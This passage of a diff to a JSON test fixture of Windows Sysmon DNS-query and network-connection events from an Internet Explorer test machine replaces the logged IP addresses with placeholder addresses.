UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -4121,7 +4121,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4150,7 +4150,7 @@ "ProcessId": "2736", "QueryName": "b.scorecardresearch.com", "QueryStatus": "0", - "QueryResults": "type: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;", + "QueryResults": "type: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.911", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4175,7 +4175,7 @@ "ProcessId": "2736", "QueryName": "edw.edmunds.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;", + "QueryResults": "type: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.921", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4193,7 +4193,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4205,7 +4205,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -4213,7 +4213,7 @@ "winlog": { "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.101", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4261,7 +4261,7 @@ "ProcessId": "2736", "QueryName": "pre-usermatch.targeting.unrulymedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;", + "QueryResults": "type: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.137", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4280,7 +4280,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -4289,7 +4289,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4309,7 +4309,7 @@ "event_data": { "QueryName": "farm.plista.com", "QueryStatus": "0", - "QueryResults": "type: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.141", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4331,7 +4331,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -4358,7 +4358,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;", + "QueryResults": "type: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.168", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4384,7 +4384,7 @@ "ProcessId": "4", "Protocol": "udp", "SourceHostname": "vagrant-2012-r2.local.crowbird.com", - "DestinationIp": "169.254.180.25", + "DestinationIp": "89.160.20.156", "DestinationIsIpv6": "false", "Image": "System", "User": "NT AUTHORITY\\SYSTEM", @@ -4414,7 +4414,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 